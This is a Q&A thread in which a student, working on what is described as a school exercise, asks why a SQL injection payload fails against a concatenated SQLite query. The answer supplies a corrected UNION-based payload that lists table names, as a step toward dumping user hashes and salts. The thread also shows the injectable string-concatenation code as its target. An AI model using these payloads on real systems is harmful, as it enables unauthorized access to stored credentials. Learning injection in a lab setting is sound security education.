# Why doesnt this sql injection attack work?

Tags: sql, sqlite, sql-injection

For school we are required to get all the other users and hashes and salts. For this i need to know the table name that stores all this information and I thought of getting it with sqlite_master. This is the query part:

```
var sql_query = 'SELECT id , name , color , planttype , potsize , shared FROM
plants WHERE user_id = ' + req . user . get ( 'id ') + ' AND name LIKE "% ' + **plant**
+ '%"; ';
```

The input line is the plant variable. I tried

```
%" OR username = 1 OR 1 = 1 UNION ALL SELECT name FROM sqlite_master WHERE type='table'; --
```

but it doesnt work for some reason.

Comment: And what error do you get?

Comment: @Shawn errors are hidden unfortunately

Comment: Well then, you need to figure out how to display sqlite error messages in whatever language you're using.

Comment: @Shawn the exercise info says that error messages are hidden from the user so i dont see how that would be possible

Comment: They're not hidden when you're testing stuff on your own.

Answer (score 0, accepted):

The problem is that both unioned queries must return the same number of columns (with identical datatypes).

This is not the case in your query, where the first query returns 6 columns, and the second only one.

I think that you could use the following input:

```
%" OR 1 = 1 UNION ALL 
 SELECT null, name, null, null, null, null 
 FROM sqlite_master 
 WHERE type='table'; --
```

This would produce a query like

```
SELECT id, name, color, planttype, potsize, shared 
FROM plants 
WHERE user_id = ? AND name LIKE "%%" OR 1 = 1
UNION ALL
SELECT null, name, null, null, null, null 
FROM sqlite_master WHERE type='table'
-- %"
```